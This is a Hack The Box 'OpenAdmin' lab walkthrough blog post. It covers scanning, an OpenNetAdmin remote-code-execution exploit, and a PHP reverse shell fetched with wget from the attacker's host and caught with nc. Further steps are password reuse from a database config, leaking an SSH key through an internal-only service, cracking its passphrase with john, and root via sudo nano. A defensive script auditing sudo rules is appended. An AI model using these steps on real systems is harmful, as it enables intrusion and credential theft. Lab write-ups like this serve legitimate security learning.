Penetration Testing: HTB of OpenAdmin

Brief introduction

This is my first attempt at penetration testing as a newcomer. I took a lot of detours along the way and looked up a lot of information, but I learned a great deal. Anyone who is interested is welcome to discuss it with me.

Initial preparation

1. Edit /etc/hosts and add a line that resolves the target's IP to the hostname openadmin (the last line in the figure). This is purely for convenience: typing a hostname is easier than re-entering the IP every time.
2. Scan the ports with nmap: nmap -A openadmin
Ports 22 and 80 are open on the server. Port 80 is the likely way in.

Looking at the web pages

1. Opening http://openadmin/ in a browser, I didn't find anything special. Scan for web directories with dirb: dirb http://openadmin/
The scan found two subdirectories, artwork and music. Opening each in the browser, artwork shows nothing notable, but the music page has a Login button in the upper right corner that jumps to a login page.
Clicking it leads to http://openadmin/ona
There is an administrator login in the top right corner. I simply tried the username admin with the password admin, and the login actually succeeded. After exploring this administrator account for a while and finding nothing special, I gave up on this route.
2. Attack OpenNetAdmin. The page title is opennetadmin, so on Kali run searchsploit opennetadmin
The OpenNetAdmin version listed for the vulnerability matches the target's version number exactly.
There are two versions of the exploit: a Metasploit module and a shell script. I tried the Metasploit one first, but it only reported "no session created". Switching to the sh version, run searchsploit -m 47691 to copy the sh file into the current directory.
cat the sh file; it takes only one parameter.
Combining this with the description of the Metasploit module from before, I guessed the parameter should be http://openadmin/ona/login.php. (Running the downloaded sh file directly gives an error, but copying and pasting its code into a new file works, for reasons I don't understand; if anyone knows why, please let me know.) After pasting the code into a new file 1.sh, run ./1.sh http://openadmin/ona/login.php
and we get a shell. pwd shows the current path is /opt/ona/www, and whoami shows the current user is www-data.

Getting the jimmy user

1. Because I had deliberately read the official OpenNetAdmin documentation beforehand, I knew that it stores a database account and password. But first, upload a webshell to get a reverse shell.
PHP reverse shell documentation
After downloading it, follow the documentation and change the IP and port in the PHP file to your own (I renamed the file p.php and set the port to 6666). Run python3 -m http.server 80, and in the target's shell run wget http://10.10.14.32/p.php.
As shown in the picture, the upload succeeded. Start listening on the local port with nc -v -n -l -p 6666, then visit http://openadmin/ona/p.php in the browser. If the local machine shows the following, the reverse shell succeeded.
2. Look for the database account and password. Under /opt/ona/www/local/config/ there is a file databases_settings.inc.php. cat it.
This gives the password of the MySQL user ona_sys. Use this password to try logging in as jimmy and joanna; jimmy logs in successfully! (I later found a related hint in /etc/apache2/sites-available/openadmin.conf.) Log in as jimmy over ssh.

Getting the joanna user

1. There is no user.txt in jimmy's home directory, so it must be under joanna. Keep gathering information. Under /var/www I found a folder owned by jimmy.
ls

cd internal
ls -l

Among them, main.php contains important information.
It outputs the joanna user's SSH key, and the reminder below it, "Don't forget your "ninja" password", is also conspicuous; I guessed it might be the passphrase of the SSH key. But obviously this file cannot be reached from the browser. The folder is named internal: internal? intranet? And since the file is owned by jimmy, in theory it should not be able to get at information in joanna's home directory.
2. I was stuck at this step for a long time; eventually I found the breakthrough in /etc/apache2/sites-available/.
Open internal.conf
When I saw AssignUserID joanna joanna in the middle, I understood: the PHP file is executed by "borrowing" the joanna user's privileges. The port is 52846. Opening it in the browser, the connection fails, and nmap -p52846 openadmin shows the port closed. Then I remembered the word internal, and cautiously typed curl http://127.0.0.1:52846/main.php on the target's command line.
Success.
Here you could change the shell code in main.php to "cat /home/joanna/user.txt" to output the flag directly. But without the joanna user you cannot get root.
3. Copy the key to the local machine. The "ninja" hinted at earlier should be the key passphrase. Log in over ssh with the key:

ssh -i ssh.txt -l joanna openadmin

Enter "ninja": error? Typing it again, still an error.
Then the only option is to crack the key.
First convert it to john format, then brute-force it with a wordlist.

python /usr/share/john/ssh2john.py ssh.txt > sshjohn
john --wordlist=/usr/share/wordlists/rockyou.txt sshjohn

We get the password "bloodninjas" (that hint was about as useful as no hint at all...)
Log in again

ssh -i ssh.txt -l joanna openadmin

Enter "bloodninjas" and we are in; one flag obtained.

Getting root

1. Since a lot of people said this box is very simple, getting the root flag on Hackthebox should not be complicated either. sudo? cowroot? Or something else?
2. sudo -l
The output shows that joanna is allowed to use sudo; the last line shows that joanna can run those two files with sudo without a password. (funny)

sudo /bin/nano /opt/priv

Press Ctrl+R to read a file, enter /root/root.txt, and the root flag is right there.
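A defender-side check for the misconfiguration above, added here as an example (not code from the original post): it parses `sudo -l` output, flags rules that run an interactive editor or pager as root, and proposes sudoedit as the fix. The sample output is constructed, since the post shows it only as a screenshot.

```python
import re

# Editors and pagers that, run as root, can read or write any file: nano's
# Ctrl+R "read file" is exactly what the walkthrough uses to reach /root/root.txt.
FILE_ACCESS_BINARIES = {"nano", "pico", "vi", "vim", "less", "more"}

# One rule line as printed by `sudo -l`, e.g. "(ALL) NOPASSWD: /bin/nano /opt/priv".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)

# Constructed sample resembling the `sudo -l` result described above (the post
# shows it only as an image); the second rule is made up for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl restart apache2
"""


def audit_sudo_rules(sudo_l_output):
    """Return one finding dict per rule whose command is an interactive editor/pager."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # "User ... may run", Defaults lines, blanks
        cmd = m.group("cmd")
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary not in FILE_ACCESS_BINARIES:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        target = cmd.split(None, 1)[1] if " " in cmd else "<any file>"
        findings.append({
            "command": cmd,
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD" in tags,
            "reason": f"{binary} running as root can open or write arbitrary files",
            # sudoedit edits a temporary copy as the calling user, so the editor
            # itself never runs with root privileges.
            "fix": f"replace with: sudoedit {target}",
        })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L):
        print(finding)
```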


Source: blog.csdn.net/sdihvai/article/details/103953010